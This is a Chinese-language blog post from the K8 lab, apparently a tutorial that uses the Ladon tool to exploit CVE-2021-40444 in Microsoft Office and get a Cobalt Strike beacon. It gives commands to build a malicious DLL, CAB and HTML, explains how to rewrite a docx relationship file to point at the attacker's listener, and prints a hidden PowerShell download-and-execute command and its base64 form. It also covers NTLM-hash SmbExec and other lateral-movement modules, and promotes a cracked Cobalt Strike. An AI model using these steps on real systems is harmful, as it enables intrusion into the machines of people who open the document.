CVE-2021-40444 Office漏洞復現CS上線

2021-12-12 K8實驗室
漏洞概述

北京時間9月8日,微軟發布安全通告披露了Microsoft MSHTML 遠程代碼執行漏洞,攻擊者可通過製作惡意的 ActiveX 控制項供託管瀏覽器呈現引擎的 Microsoft Office文檔使用,成功誘導用戶打開惡意文檔後,可在目標系統上以該用戶權限執行任意代碼。微軟在通告中指出已檢測到該漏洞被在野利用,請相關用戶採取措施進行防護。

MSHTML(又稱為Trident)是微軟旗下的Internet Explorer 瀏覽器引擎,也用於 Office 應用程式,以在 Word、Excel 或 PowerPoint 文檔中呈現 Web 託管的內容。AcitveX控制項是微軟COM架構下的產物,在Windows的Office套件、IE瀏覽器中有廣泛的應用,利用ActiveX控制項即可與MSHTML組件進行交互。


影響版本

包括Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022

Ladon8.9更新功能

Ladon 8.9 2021.9.14
[+]CVE-2021-40444 Microsoft MSHTML遠程代碼執行漏洞,Office文檔利用模塊
影響版本: 

包括Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022
[+]CmdDll cmd轉DLL(Win系統0day漏洞DLL執行命令payload,可直接powershell上線CobaltStrike)
  溢出漏洞如MS17010、本地提權CVE-2021-1675等,非溢出如最新的Office漏洞CVE-2021-40444等

Ladon 8.8 2021.911
[+]SmbExec NTLM-HASH非交互執行無回顯
[u]GetInfo  新增Vmware虛擬機信息
[u]OsScan   新增識別Vigor Router路由器識別
[u]新增Xen\VBOX\Hybrid\Parallels虛擬機識別
[+]GetInfo  新增cmdkey、RrpLog、安裝驅動、軟體列表、最近訪問文件等
[+]GetInfo  新增GUID、CPUID、硬碟ID、自啟動後門檢測(DLL卻持、註冊表等)
[+]GetInfo2 新增WMI補丁信息獲取
[+]默認信息 新增C盤剩餘空間信息小於2G高亮提示


ladon8.9模塊用法CmdDLL用法

Usage:
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=

請根據實際需要使用對應CMD命令生成DLL,例子為彈計算器


GUI版用法

http://k8gege.org/Ladon/cmddll.html


CVE-2021-40444用法

Usage:
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

PS:此模塊需使用Ladon40.exe


CVE-2021-40444復現測試環境

Win10 x64
0ffice 2019


安裝Office2019

隨便找個試用版就可以了,沒必要激活,如果下的是IMG把IMG改為ZIP解壓安裝即可。

CmdDll生成dll


CVE-2021-40444 MakeCab將DLL轉成CAB

由於目標是Win10 X64系統,所以我們使用64位的DLL,命令:Ladon CVE-2021-40444 MakeCab sc64.dll


CVE-2021-40444 MakeHtml生成Poc.html

生成html,URL需指向Ladon監聽的地址


啟動web監聽


doc樣本修改

樣本9月10號已發在小密圈,docx後綴改為cab或zip,即可編輯rels文件,指向Ladon監聽的地址poc.html,保存再改名為.docx


彈計算器演示

在win10上執行doc文件時,可通過Ladon監聽看到整個請求過程,docx先訪問html,由漏洞觸發加載我們封裝的CAB文件,通過CPL執行安裝INF,加載我們的DLL,演示DLL功能為彈計算器。



Cobalt Strike上線Base64加密

LadonGui—Encode–Base64Unicode加密

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.250.25:80/a'))"

PS:其它複雜CMD語句同理


生成DLL

Ladon.exe CmdDll b64x64 cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyADUAMAAuADIANQA6ADgAMAAvAGEAJwApACkAIgA=

CS上線演示

SmbExec用法

Load SmbExec
Usage:
Ladon SmbExec host user pass cmd whoami
Ladon SmbExec host user pass b64cmd dwBoAG8AYQBtAGkA


SmbExec執行

在Cobalt Strike的shell下執行SmbExec需要帶空格引號參數時,CS轉義有問題,使用正常CMD命令比較麻煩,所以我增加了個b64cmd參數便於在CS下使用(這個方法在幾個月前的BypassUac裡使用,很多人不知道為什麼這樣做,直接CMD命令不好嗎,非要經過一步加密,當你要執行的CMD命令含有很多轉義時你就知道了,得經過CS轉義成CMD轉義得到正常CMD很麻煩)。b64cmd命令可通過LadonGUI 8.2以後版本使用Base64Unicode加密生成


執行結果


Ladon其它橫向移動模塊ID模塊名稱功能說明用法1WmiExec135埠執行命令http://k8gege.org/Ladon/WinShell.html2PsExec445埠執行命令http://k8gege.org/Ladon/WinShell.html3AtExec445埠執行命令http://k8gege.org/Ladon/WinShell.html4SshExec22埠執行命令http://k8gege.org/Ladon/WinShell.html5JspShellJsp一句話執行命令http://k8gege.org/p/ladon_cs_shell.html6WebShellWebShell執行命令http://k8gege.org/Ladon/webshell.html7WinrmExec5895埠執行命令http://k8gege.org/Ladon/WinrmExec.html8SmbExec445埠HASH執行命令http://k8gege.org/Ladon/SmbExec.html

推薦文章

Ladon9.1簡明使用教程

巨龍拉冬: 讓你的Cobalt Strike變成超級武器

〖工具〗Cobalt Strike 3.12 3.13 4.3 4.4 K8破解版

相關焦點

  • 漏洞分析 | CVE-2021-40444
    >隨著cve-2021-40444的披露,隨機引爆了全球的網絡安全,雖然最近微軟發布了補丁,但是cve-2021-40444的利用卻越發猖狂,本人深入分析了這個漏洞。cve-2021-40444的poc很快公開在了github[2]上,poc的使用很簡單,通過sudo python3
  • CVE-2021-40444 漏洞深入分析
    從樣本庫眾獲取到mountain.html後,我們打開一看,發現全部都混淆了,基本難辨真假,去混淆也比較簡單因為是js代碼,隨便找個網上去混淆的試試,比如http://jsnice.org/這就很簡單了,我通過普通腳本再一次去混淆:經過簡單的靜態分析與調試,基本上就是它會去請求伺服器獲取一個ca
  • 騙子繞過 CVE-2021-40444 的 Microsoft Office 補丁來傳播 Formbook 惡意軟體
    文章來源:https://securityaffairs.co原文連結:https://securityaffairs.co/wordpress/125927/malware/ms-office-cve
  • CVE-2017-11882 office緩存溢出漏洞復現
    電腦中有9臺電腦用的是盜版,即便激活成功大多也是盜版的授權許可,在如此大的基數下,國內辦公軟體行業市場現狀,office必定屬於前列,所以搜索相關文章,綜合分析,感覺都在說,微軟Office套件最有效的攻擊手段,是基於CVE-2017-11882的漏洞,於是乎找到cve-2017-11882這個漏洞,做漏洞復現,隨有下文。
  • CVE-2018-7600 Drupal遠程執行漏洞復現
    漏洞簡介Drupal是一個開源內容管理系統(CMS),全球超過100萬個網站(包括政府,電子零售,企業組織,金融機構等
  • CVE-2021-42287 域內提權漏洞復現
    CVE-2021-42287 域內提權漏洞復現 漏洞原理:如果獲得了 DC 用戶的TGT
  • CVE-2021-1675 漏洞復現
    0x00 前言最近比較有熱度的一個洞,CVE-2021-1675,看著危害程度比較高,也來湊熱鬧復現一下。該漏洞後續CVE-2021-34527,也懶得復現了,大差不差。來自推特大佬的圖鎮樓RCE復現環境DC:Windows Server 2019    IP:192.168.159.15
  • [漏洞復現] CVE-2017-11882 通殺所有Office版本
    舉個例子,如果黑客利用這個漏洞,構造帶有shell後門的office文件,當普通用戶打開這個office文件,則電腦可以被黑客直接控制。影響版本: office 2003 office 2007 office 2010 office 2013 office 20162、漏洞復現環境
  • CVE-2021-3156 漏洞復現
    漏洞介紹2021年
  • 【賊詳細 | 附PoC工具】Apache HTTPd最新RCE漏洞復現
    >docker部署命令(一):docker pull blueteamsteve/cve-2021-41773:with-cgiddocker run -d -p 7006:80 blueteamsteve/cve-2021-41773:with-cgid
  • Exchange CVE-2021-26855 漏洞復現
    0x1 漏洞概述CVE-2021-26855 是Exchange中的服務端請求偽造漏洞(SSRF),利用此漏洞的攻擊者能夠發送任意HTTP請求並繞過
  • CVE-2020-2883漏洞復現
    (CVE-2020-2883、CVE-2020-2884),允許未經身份驗證的攻擊者通過T3協議網絡訪問並破壞易受攻擊的WebLogic Server,成功的漏洞利用可導致WebLogic Server被攻擊者接管,從而造成遠程代碼執行。
  • 內網環境復現Flash漏洞
    相關知識介紹    2.1 exp介紹    EXP = Exploit的中文意思是「漏洞利用」。意思是一段對漏洞如何利用的詳細說明或者一個演示的漏洞攻擊代碼,可以使得讀者完全了解漏洞的機理以及利用的方法。
  • 一個換行符引發的奧斯卡0day漏洞(CVE-2017-8759)復現
    CVE-2017-8759 WSDL 解析器代碼注入        代碼注入漏洞是存在於WSDL解析模塊的PrintClientProxy方法(http://referencesource.microsoft.com/ -System.Runtime.Remoting/metadata/wsdlparser.cs
  • 微軟通殺漏洞-CVE-2021-1675復現
    利用漏洞python CVE-2021-1675.py demonba.xxx/yuce:Hello7p@192.168.189.145 '\\192.168.189.146\smb\rever.dll'
  • CVE-2021-1675漏洞復現
    Windows 10 Version 21H1 for ARM64-based SystemsWindows 10 Version 21H1 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows 10 Version 1909 for x64-based
  • NetLogon 域內提權漏洞(CVE-2020-1472)復現過程
    ,可利用此漏洞獲取域管訪問權限。Windows Server, version 1903 (Server Core installation)Windows Server, version 1909 (Server Core installation)Windows Server, version 2004 (Server Core installation)復現過程
  • CVE-2020-11107:XAMPP任意命令執行漏洞復現
    *,<7.4.40x03環境搭建● 漏洞環境:1.準備一臺裝有window系統的虛擬機,本次復現以windows10系統為例。 2.下載XAMPP,本次復現以7.2.25版本為例,下載地址:連結:https://pan.baidu.com/s/1U2w-5cIysbEIwtF9YYfOsQ 提取碼:oi88其他漏洞版本下載地址:https://sourceforge.net/projects/xampp/files/● 環境安裝和配置:
  • Atlassian Jira 模板注入漏洞(CVE-2019-11581)復現
    漏洞描述Atlassian Jira是企業廣泛使用的項目與事務跟蹤工具,被廣泛應用於缺陷跟蹤、客戶服務、需求收集
  • vulhub漏洞復現練習——phpMyAdmin(CVE-2016-5734)(遠程代碼執行漏洞)
    phpMyAdmin(CVE-2016-5734)(遠程代碼執行漏洞)漏洞復現環境是在kali裡面配置的vulhub